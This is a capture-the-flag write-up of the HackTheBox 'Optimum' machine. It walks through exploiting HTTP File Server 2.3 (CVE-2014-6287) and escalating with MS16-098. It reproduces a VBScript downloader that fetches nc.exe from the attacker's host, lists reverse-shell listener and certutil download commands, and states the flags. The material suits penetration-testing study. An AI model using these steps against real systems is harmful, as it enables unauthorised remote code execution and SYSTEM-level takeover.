[hackthebox] Optimum

optimum
This is a relatively easy machine; as the matrix shows, the attacks are mostly CVE-based rather than misconfiguration-based.

nmap enumeration

nmap -A -p- -T4 -oN optimum -vvv 10.10.10.8
optimum2

Http File Server 2.3

As shown in the web browser, the web service is hosted by HTTP File Server (HFS), a Windows program for serving files over HTTP. It is easy to set up and use with very little effort on the user's end, which is also why it is so often found exposed.
optimum3

optimum4

httpfileserver 2.3 exploit

A search on the web reveals that HFS 2.3 has a remote code execution vulnerability (CVE-2014-6287) with a public exploit written in Python:
https://www.exploit-db.com/exploits/39161

Reading the exploit code, it is clear that the Python script writes a VBScript file onto the target with the following source code (ip_addr is the attacker's address filled in by the script):

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
xHttp.Send

with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
end with

The VBScript downloads nc.exe from the attacker's machine and saves it as C:\Users\Public\nc.exe. The exploit then executes the script, and finally runs nc.exe to open a reverse TCP connection that hands back a cmd shell. The vulnerability in HFS 2.3 lies in its search parameter: HFS stops parsing the search string at a null byte, so a request whose search value starts with %00 has the remainder evaluated as HFS macro text, and macros such as {.save|...} and {.exec|...} let an unauthenticated client write files and run programs on the server. See this:
optimum6

Get the user flag

I need to start a web server that hosts nc.exe, and in another terminal start an nc listener. The web server must be on port 80, because the VBScript fetches http://<ip>/nc.exe without specifying a port.
In the exploit code I change the IP address to my own tunnel IP address so that the exploit connects back to my nc listener.
Step 1:
python3 -m http.server 80
This command has to be executed in the directory that contains nc.exe.
optimum7

Step 2:
Then start my nc listener on the port the exploit uses (443 by default): sudo nc -lvnp 443
optimum8

Step 3:
Modify the IP address (ip_addr, and local_port if you changed it) within the exploit code, then run it. Note that the script is written for Python 2 (it imports urllib2).
optimum9

python 39161.py 10.10.10.8 80
optimum10
optimum11

The user flag is d0c39409d7b994a9a1389ebf38ef5f73

Get the root

I recommend taking a look at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Running systeminfo shows the machine is Windows Server 2012 R2 Standard, build 9600, and a few kernel exploits are usable. I chose the win32k.sys kernel driver exploit for MS16-098. Although it is published for Windows 8.1, it works perfectly on Windows Server 2012 R2 as well, since both are NT 6.3 (build 9600) and share the same kernel.
I download the compiled binary bfill.exe and serve it from a web server so I can fetch it from Optimum.
optimum13

optimum14

On the Optimum machine I fetch it with certutil, which is present on every Windows host and works without PowerShell: certutil -f -urlcache http://10.10.14.27/bfill.exe c:\users\kostas\downloads\bfill.exe
optimum15

Then run the exploit to get a SYSTEM shell.
optimum16

optimum17

the root flag is 51ed1b36553c8461f4552c2e92b3eeed
